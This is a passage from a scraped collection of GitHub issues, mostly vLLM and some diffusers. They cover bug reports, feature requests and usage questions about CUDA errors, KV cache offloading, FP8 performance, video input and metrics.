"### My current environment\n\nEnvironment:\nModel: RedHatAI/Llama-4-Scout-17B-16E-Instruct-FP8-dynamic\nvLLM Version: latest main (installed via pip)\nHardware: 4\u00d7 NVIDIA H100 PCIe (80GB)\nDriver: 550.xx\nCUDA: 12.2\nPyTorch: 2.4.0\nOS: Ubuntu 22.04\nLaunch Command:\npython3 -m vllm.entrypoints.api_server \\\n --model /ephemeral/huggingface/models--RedHatAI--Llama-4-Scout-17B-16E-Instruct-FP8-dynamic/snapshots/... \\\n --tensor-parallel-size 4 \\\n --gpu-memory-utilization 0.85 \\\n --kv-cache-dtype fp8_e4m3 \\\n --max-model-len 4000000 \\\n --max-num-seqs 16 \\\n --enable-prefix-caching \\\n --kv-events-config '{\"enable_kv_cache_events\": true, \"publisher\": \"zmq\", \"endpoint\": \"tcp://*:5557\"}'\n\n\n### bug\n\nRuntimeError: CUDA driver error: invalid device ordinal\n(EngineCore_DP0 pid=11546) ERROR [symm_mem.py:88] handle = torch_symm_mem.rendezvous(self.buffer, self.group.group_name)\n(EngineCore_DP0 pid=11546) ERROR WorkerProc failed to start\nRuntimeError: Engine core initialization failed. See root cause above. Failed core proc(s): {'EngineCore_DP0': 1}\n\nBehavior:\nWhen symm_mem is enabled (default) \u2192 fails with invalid device ordinal\nWhen symm_mem is disabled via --disable-symm-mem \u2192\n\u2705 vLLM engine starts\n\u274c No KV cache event logs (BlockStored, BlockRemoved, etc.)\n\u274c No prefix cache hit metrics\n\nWhat I\u2019ve Tried\n\nVerified all 4 GPUs visible via nvidia-smi\nConfirmed correct CUDA device indexing\nReduced tensor-parallel-size to 2 \u2192 same error\nChecked for NCCL initialization issues \u2014 none\nManually set CUDA_VISIBLE_DEVICES=0,1,2,3\nRebuilt PyTorch + vLLM from source with USE_SYMMETRIC_MEMORY=1 \u2014 same result\nQuestion:\nIs there a known compatibility issue between symmetric memory (torch_symm_mem) and H100 PCIe devices in multi-GPU setups?\nIf so, is there a fallback mechanism to preserve KV event publishing (--kv-events-config) when symmetric memory is disabled?\n\nThanks for looking into it.\n", "url": "https://github.com/vllm-project/vllm/issues/26949", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-15T22:08:34Z", "updated_at": "2025-12-25T03:42:49Z", "comments": 2, "user": "vadapallij" }, { "repo": "vllm-project/vllm", "number": 26940, "title": "[Feature]: Support `inf` value for burstiness in benchmarks", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn the benchmarks, the burstiness value is used in a gamma distribution to sample the delays between consecutive requests. \n```\ntheta = 1.0 / (current_request_rate * burstiness)\ndelay_ts.append(np.random.gamma(shape=burstiness, scale=theta))\n```\n\n[Theoretically ](https://en.wikipedia.org/wiki/Gamma_distribution)(and this is also what is observed in practice), the generated delays have as mean `1.0 / current_request_rate` and the spread is controlled by the burstiness. When the burstiness is high, we observe lower variance in the delay values, all values being closer to the mean `1.0 / current_request_rate`. When burstiness tends to infinity, we should observe a single generated delay, which is `1.0 / current_request_rate`. In practice, the `np.random.gamma` function generates `nan` as results, so we need to manually condition on `burstiness` value and append `1.0 / current_request_rate` to the list of delays when burstiness becomes infinite.\n\nSee attached image as mathematical proof\n\n\"Image\"\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26940", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-15T19:39:03Z", "updated_at": "2025-11-03T18:33:19Z", "comments": 0, "user": "sducouedic" }, { "repo": "vllm-project/vllm", "number": 26914, "title": "[Usage]: \u4e3a\u4ec0\u4e48\u5728\u91c7\u96c6\u7684profiling\u4e2d\u770b\u4e0d\u5230\u901a\u4fe1\u7b97\u5b50\uff1f", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\u901a\u8fc7llm.start_profile\u548cstop_profile\uff0c\u6211\u91c7\u96c6\u5230\u4e86profiling\uff0c\u4f46kernel_details\u91cc\u9762\u770b\u4e0d\u5230\u901a\u4fe1\u7b97\u5b50\u3002\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26914", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-15T13:38:14Z", "updated_at": "2025-10-15T13:38:14Z", "comments": 0, "user": "sheep94lion" }, { "repo": "vllm-project/vllm", "number": 26903, "title": "[Usage]: vLLM for video input", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of qwen2.5-vl or qwen2.5-omni. \n\nWhen I convert the video to base64 for api calls (e.g. openai format), I found that vLLM seems to use all the video frames by checking the number of prompt tokens.\n\nIs there any parameter similar to fps to control the sampling rate?\nOr do I need to sample the video externally well in advance, save it as video and then convert to base64?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26903", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-15T09:29:23Z", "updated_at": "2025-12-11T03:26:33Z", "comments": 6, "user": "King-king424" }, { "repo": "huggingface/diffusers", "number": 12492, "title": "module transformers has no attribute CLIPFeatureExtractor", "body": "### System Info\n\nlatest main\n\n### Who can help?\n\n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nfrom diffusers import AnimateDiffPipeline\n\npipe = AnimateDiffPipeline.from_pretrained(\"emilianJR/epiCRealism\")\n```\nerror:\n```\nTraceback (most recent call last):\n File \"\", line 1, in \n File \"/opt/venv/lib/python3.12/site-packages/huggingface_hub/utils/_validators.py\", line 89, in _inner_fn\n return fn(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_utils.py\", line 1024, in from_pretrained\n loaded_sub_model = load_sub_model(\n ^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_loading_utils.py\", line 752, in load_sub_model\n class_obj, class_candidates = get_class_obj_and_candidates(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_loading_utils.py\", line 419, in get_class_obj_and_candidates\n class_obj = getattr(library, class_name)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/transformers/src/transformers/utils/import_utils.py\", line 1920, in __getattr__\n raise AttributeError(f\"module {self.__name__} has no attribute {name}\")\nAttributeError: module transformers has no attribute CLIPFeatureExtractor\n```\n\n\n\n### Expected behavior\n\nAs transformers deprecated FeatureExtractor classes in favor of ImageProcessor classes for image preprocessing. How to handle models that already set FeatureExtractor in model hub like [emilianJR/epiCRealism](https://huggingface.co/emilianJR/epiCRealism/blob/main/feature_extractor/preprocessor_config.json#L11)?", "url": "https://github.com/huggingface/diffusers/issues/12492", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-15T08:26:05Z", "updated_at": "2025-11-03T05:02:54Z", "comments": 3, "user": "jiqing-feng" }, { "repo": "vllm-project/vllm", "number": 26858, "title": "[RFC]: Top-level CLI interface for KV cache offloading", "body": "### Motivation.\n\nCPU (and tier-2 storage) offloading is an important feature in many cases (multi-round QA, document analysis, agent workflow, and reinforcement learning). With the recent advancement in the offloading connector, we already have the vLLM native CPU offloading implemented via the connector API. Also, there are multiple community efforts to provide other offloading implementations (e.g., LMCache, Nixl storage, mooncake) via the same set of APIs.\n\nHowever, there is no clear documentation about how to configure the CPU offloading from the user's perspective. Right now, in order to enable CPU offloading, the user needs to pass a JSON string to `--kv-transfer-config`, which may create a huge mental barrier for new users. Therefore, it would be better to have a simple & clear user interface for users to enable CPU offloading. \n\n### Proposed Change.\n\n\nThis proposal contains two new command-line arguments:\n- `--kv-offloading-size`: a numeric value to control a global offloading buffer size (in GB). When TP > 1, this number should be the total size summed across all the TP ranks. (An alternative is the buffer size for each TP rank.)\n- `--kv-offloading-backend`: a string that specifies which offloading backend to use, such as \"native\", \"lmcache\", \"mooncake\", \"3fs\", or \"nixl\".\n\nThis will give enough clarity to most of the users who want to use the offloading feature, and should be extensible enough to new offloading backends and tier-2 storage.\n\n## Required changes\n\nTo implement this proposal, the following things are needed:\n- Add logic to parse the new CLI argument and store it into vllm config.\n- Add a new module to translate the `--kv-offloading-size` and `--kv-offloading-backend` to the corresponding KV connector config.\n- Add the documentation to the vLLM user guide.\n\n### Feedback Period.\n\n1~2 weeks\n\n### CC List.\n\n@simon-mo @orozery @njhill \n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26858", "state": "closed", "labels": [ "RFC" ], "created_at": "2025-10-15T00:11:15Z", "updated_at": "2025-11-01T07:17:08Z", "comments": 8, "user": "ApostaC" }, { "repo": "huggingface/diffusers", "number": 12485, "title": "How to enable Context Parallelism for training", "body": "Hi @a-r-r-o-w , I would like to ask you for tips on using Context Parallelism for distributed training.\n\n**Is your feature request related to a problem? Please describe.**\nHere is the minimal code for adapting Context Parallelism into diffusion model training\n\n```python\n# Diffusers Version: 0.36.0.dev0\nfrom diffusers.models._modeling_parallel import ContextParallelConfig\n\n# I have 8 GPUs in total\ncp_config = ContextParallelConfig(ring_degree=1, ulysses_degree=8)\nflux_transformer.enable_parallelism(config=cp_config)\n\nloss = train(flux_transformer)\naccelerator.backward(loss)\ngrad_norm = accelerator.clip_grad_norm_(flux_transformer.parameters(), args.max_grad_norm)\n```\n\nHowever, there is a bug:\n```bash\n[rank5]: Traceback (most recent call last):\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1494, in \n[rank5]: main_with_cleanup(args)\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1460, in main_with_cleanup\n[rank5]: main(args)\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1216, in main\n[rank5]: grad_norm = accelerator.clip_grad_norm_(flux_transformer.parameters(), args.max_grad_norm)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/accelerate/accelerator.py\", line 2863, in clip_grad_norm_\n[rank5]: return torch.nn.utils.clip_grad_norm_(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 36, in _no_grad_wrapper\n[rank5]: return func(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 222, in clip_grad_norm_\n[rank5]: _clip_grads_with_norm_(parameters, max_norm, total_norm, foreach)\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 36, in _no_grad_wrapper\n[rank5]: return func(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 155, in _clip_grads_with_norm_\n[rank5]: clip_coef = max_norm / (total_norm + 1e-6)\n[rank5]: ~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_tensor.py\", line 39, in wrapped\n[rank5]: return f(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_tensor.py\", line 1101, in __rdiv__\n[rank5]: return self.reciprocal() * other\n[rank5]: ^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_compile.py\", line 53, in inner\n[rank5]: return disable_fn(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_dynamo/eval_frame.py\", line 929, in _fn\n[rank5]: return fn(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_api.py\", line 350, in __torch_dispatch__\n[rank5]: return DTensor._op_dispatcher.dispatch(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_dispatch.py\", line 166, in dispatch\n[rank5]: self.redistribute_local_args(\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_dispatch.py\", line 303, in redistribute_local_args\n[rank5]: resharded_local_tensor = redistribute_local_tensor(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_redistribute.py\", line 208, in redistribute_local_tensor\n[rank5]: new_local_tensor = partial_spec._reduce_value(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_ops/_math_ops.py\", line 126, in _reduce_value\n[rank5]: reduced_tensor = super()._reduce_value(tensor, mesh, mesh_dim)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/placement_types.py\", line 679, in _reduce_value\n[rank5]: return funcol.all_reduce(\n[rank5]: ^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/_functional_collectives.py\", line 175, in all_reduce\n[rank5]: group_name = _resolve_group_name(group, tag)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/_functional_collectives.py\", line 783, in _resolve_group_name\n[rank5]: return dmesh._dim_group_names[dim]\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: AttributeError: 'DeviceMesh' obj", "url": "https://github.com/huggingface/diffusers/issues/12485", "state": "closed", "labels": [], "created_at": "2025-10-14T21:48:35Z", "updated_at": "2025-10-15T20:33:30Z", "user": "liming-ai" }, { "repo": "vllm-project/vllm", "number": 26840, "title": "[Doc]: Update AWQ Guide", "body": "### \ud83d\udcda The doc issue\n\nSituation: AutoAWQ functionality was adopted by llm-compressor but vllm [docs](https://docs.vllm.ai/en/latest/features/quantization/auto_awq.html) point to AutoAWQ which is deprecated\n\n\n### Suggest a potential alternative/fix\n\n1) Update the [AutoAWQ guide](https://github.com/vllm-project/vllm/blob/main/docs/features/quantization/auto_awq.md) to use the [llm-compressor](https://github.com/vllm-project/llm-compressor/tree/2a6a0a34c8a57b6090b5fbac9c0659edf982185c/examples/awq) apis/flow\n2) Make sure to also update links in [quantization doc](https://github.com/vllm-project/vllm/blob/main/docs/features/quantization/README.md)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26840", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-14T20:02:21Z", "updated_at": "2025-11-03T15:39:12Z", "comments": 0, "user": "HDCharles" }, { "repo": "vllm-project/vllm", "number": 26838, "title": "[Performance]: RTX 6000 PRO - FP8 in sglang is faster", "body": "### Proposal to improve performance\n\nCan we have a discussion about the sglang FP8 performance vs VLLM performance - \n\nI'm able to get 133 tokens/sec with sglang GLM-4.5-Air-FP8 vs 78 tokens/sec in VLLM \n\n```PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True USE_TRITON_W8A8_FP8_KERNEL=1 SGL_ENABLE_JIT_DEEPGEMM=0 python -m sglang.launch_server --model /mnt/GLM-4.5-FP8/ --tp 4 --host 0.0.0.0 --port 5000 --mem-fraction-static 0.93 --context-length 128000 --enable-metrics --attention-backend flashinfer --tool-call-parser glm45 --reasoning-parser glm45 --served-model-name glm-4.5-air --chunked-prefill-size 8092 --enable-mixed-chunk --cuda-graph-max-bs 32 --kv-cache-dtype fp8_e5m2```\n\nIt is using TRITON \n\nI'm not able to achieve the same speed with VLLM with any methods - neither flashinfer, nor triton etc. - the maximum is always around 78 tokens/sec \n\n1) Any idea how to achieve the same 133tokens/sec in VLLM using triton and same configuration like in sglang? \n2) is it cutlass design that it is not that fast as triton? \n\n\n\n\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26838", "state": "open", "labels": [ "performance" ], "created_at": "2025-10-14T19:41:14Z", "updated_at": "2025-12-29T14:52:57Z", "comments": 10, "user": "voipmonitor" }, { "repo": "vllm-project/vllm", "number": 26817, "title": "[Feature]: Add process_weights_after_loading to AttentionImpl", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCurrently, in the `Attention` layer, we check if `process_weights_after_loading` exists and then call it conditionally, and after that we apply flashinfer-specific logic.\n\nInstead, we should just add a `process_weights_after_loading` method to AttentionImpl (no-op) by default, call it from `Attention.process_weights_after_loading`, and override it in `FlashInferAttentionImpl`.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\nhttps://github.com/vllm-project/vllm/pull/23016#discussion_r2414787224\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26817", "state": "closed", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-10-14T15:59:54Z", "updated_at": "2025-10-16T15:02:31Z", "comments": 2, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 26806, "title": "[Usage]: MCP-USE with VLLM gpt-oss:20b via ChatOpenAI", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\ni am trying to create an agent using gpt-oss:20B with mcp-use \n\nmost times the model returns \"Agent completed the task successfully.\", and sometimes the proper output which is required\n\n### code \n`vllm serve openai/gpt-oss-20b --max-model-len 100000 --gpu-memory-utilization 0.9 --port 8000 --tool-call-parser openai --enable-auto-tool-choice`\n\nclient = MCPClient.from_dict(config)\nllm = ChatOpenAI(\n model=\"openai/gpt-oss-20b\",\n base_url=\"http://127.0.0.1:8000/v1\", \n api_key=\"not-needed\",\n temperature=0.8,\n max_tokens=2048\n)\nagent = MCPAgent(llm=llm, client=client, max_steps=30)\n\n\nalso raising this on mcp-use\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26806", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T13:00:38Z", "updated_at": "2025-11-20T06:33:29Z", "comments": 2, "user": "Tahirc1" }, { "repo": "vllm-project/vllm", "number": 26786, "title": "[Usage]: cuda12.8 docker 0.11.0 Error occurs when launching the model, NCCL error: unhandled cuda error.", "body": "When I use only a single graphics card, the system can start up normally.\nBelow are Docker configuration files, logs, and environment information.\n\nI encountered this issue when upgrading from version 10.1.1 to 10.2.\n\n[The system generates an error when using dual graphics cards; version 10.1.1 functions correctly, but version 10.2 triggers an error upon execution.](https://github.com/vllm-project/vllm/issues/25813)\n\n### Your current environment\n\n```text\n# vllm collect-env \nINFO 10-14 19:07:58 [__init__.py:216] Automatically detected platform cuda.\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 4090\nGPU 1: NVIDIA GeForce RTX 4090\n\nNvidia driver version : 571.96\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6148 CPU @ 2.40GHz\nCPU family: 6\nModel: 85\nThread(s) per core: 2\nCore(s) per socket: 20\nSocket(s): 1\nStepping: 4\nBogoMIPS: 4788.75\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch pti ssbd ibrs ibpb stibp fsgsbase bmi1 hle avx2 smep bmi2 erms invpcid rtm avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves md_clear flush_l1d arch_capabilities\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 640 KiB (20 instances)\nL1i cache: 640 KiB (20 instances)\nL2 cache: 20 MiB (20 instances)\nL3 cache: 27.5 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Unknown: Dependent on hypervisor status\nVulnerability Itlb multihit: KVM: Mitigation: VMX unsupported\nVulnerability L1tf: Mitigation; PTE Inversion\nVulnerability Mds: Mitigation; Clear CPU buffers; SMT Host state unknown\nVulnerability Meltdown: Mitigation; PTI\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT Host state unknown\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; IBRS; IBPB conditional; STIBP conditional; RSB filling; PBRSB-eIBRS Not affected; BHI SW loop, KVM SW loop\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Mitigation; Clear CPU buffers; SMT Host state unknown\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==", "url": "https://github.com/vllm-project/vllm/issues/26786", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-14T09:01:39Z", "updated_at": "2025-11-07T17:17:32Z", "comments": 3, "user": "ooodwbooo" }, { "repo": "vllm-project/vllm", "number": 26774, "title": "[Usage]: how to use vllm on CUDA 12.9", "body": "### Your current environment\n\n```text\nTraceback (most recent call last):\n File \"/vllm-workspace/collect_env.py\", line 825, in \n main()\n File \"/vllm-workspace/collect_env.py\", line 804, in main\n output = get_pretty_env_info()\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 799, in get_pretty_env_info\n return pretty_str(get_env_info())\n ^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 619, in get_env_info\n cuda_module_loading=get_cuda_module_loading_config(),\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 540, in get_cuda_module_loading_config\n torch.cuda.init()\n File \"/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py\", line 339, in init\n _lazy_init()\n File \"/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py\", line 372, in _lazy_init\n torch._C._cuda_init()\nRuntimeError: No CUDA GPUs are available\nroot@test2222-7dcd6b94b7-wl6w4:/vllm-workspace# python3 --version\nPython 3.12.1\n```\n\n\n### How would you like to use vllm\n\nMy node CUDA version is 12.9, and the running pod image CUDA variable is 12.8. Will this cause the No CUDA GPUs are available error? Is 12.9 compatible with version 12.8? Should we upgrade the VLLM version or lower the CUDA version of the node to 12.8\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26774", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T07:30:56Z", "updated_at": "2025-10-14T07:40:08Z", "comments": 1, "user": "Mrpingdan" }, { "repo": "vllm-project/vllm", "number": 26772, "title": "[Feature]: Option kv_event default config", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCurrent kv_event config publisher is null, but endpoint is zmq endpoint, so when not set publisher config, vllm cannot start, got a error: `EventPublisher.__init__() got an unexpected keyword argument 'endpoint'`.\n\nCan we change this default publisher to zmq, when start enable_kv_cache_events after use can direct use.\nhttps://github.com/vllm-project/vllm/blob/d32c611f455766c9d67034b5e0f8e66f28f4a3ba/vllm/config/kv_events.py#L20-L24\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26772", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-14T07:08:58Z", "updated_at": "2025-10-22T19:19:34Z", "comments": 5, "user": "lengrongfu" }, { "repo": "vllm-project/vllm", "number": 26762, "title": "[Usage]: about curl http://ip:8000/metrics", "body": "### Your current environment\n\nWhen I run this command, I get the following results: \n# HELP python_gc_objects_collected_total Objects collected during gc\n# TYPE python_gc_objects_collected_total counter\npython_gc_objects_collected_total{generation=\"0\"} 12286.0\npython_gc_objects_collected_total{generation=\"1\"} 1244.0\npython_gc_objects_collected_total{generation=\"2\"} 1326.0\n# HELP python_gc_objects_uncollectable_total Uncollectable objects found during GC\n# TYPE python_gc_objects_uncollectable_total counter\npython_gc_objects_uncollectable_total{generation=\"0\"} 0.0\npython_gc_objects_uncollectable_total{generation=\"1\"} 0.0\npython_gc_objects_uncollectable_total{generation=\"2\"} 0.0\n# HELP python_gc_collections_total Number of times this generation was collected\n# TYPE python_gc_collections_total counter\npython_gc_collections_total{generation=\"0\"} 1378.0\npython_gc_collections_total{generation=\"1\"} 124.0\npython_gc_collections_total{generation=\"2\"} 9.0\n# HELP python_info Python platform information\n# TYPE python_info gauge\npython_info{implementation=\"CPython\",major=\"3\",minor=\"12\",patchlevel=\"11\",version=\"3.12.11\"} 1.0\n# HELP process_virtual_memory_bytes Virtual memory size in bytes.\n# TYPE process_virtual_memory_bytes gauge\nprocess_virtual_memory_bytes 1.1701968896e+010\n# HELP process_resident_memory_bytes Resident memory size in bytes.\n# TYPE process_resident_memory_bytes gauge\nprocess_resident_memory_bytes 1.045848064e+09\n# HELP process_start_time_seconds Start time of the process since unix epoch in seconds.\n# TYPE process_start_time_seconds gauge\nprocess_start_time_seconds 1.76036994809e+09\n# HELP process_cpu_seconds_total Total user and system CPU time spent in seconds.\n# TYPE process_cpu_seconds_total counter\nprocess_cpu_seconds_total 148.44\n# HELP process_open_fds Number of open file descriptors.\n# TYPE process_open_fds gauge\nprocess_open_fds 69.0\n# HELP process_max_fds Maximum number of open file descriptors.\n# TYPE process_max_fds gauge\nprocess_max_fds 1.048576e+06\n# HELP http_requests_total Total number of requests by method, status and handler.\n# TYPE http_requests_total counter\nhttp_requests_total{handler=\"none\",method=\"GET\",status=\"4xx\"} 1.0\n# HELP http_requests_created Total number of requests by method, status and handler.\n# TYPE http_requests_created gauge\nhttp_requests_created{handler=\"none\",method=\"GET\",status=\"4xx\"} 1.7604160309440813e+09\n# HELP http_request_size_bytes Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_request_size_bytes summary\nhttp_request_size_bytes_count{handler=\"none\"} 1.0\nhttp_request_size_bytes_sum{handler=\"none\"} 0.0\n# HELP 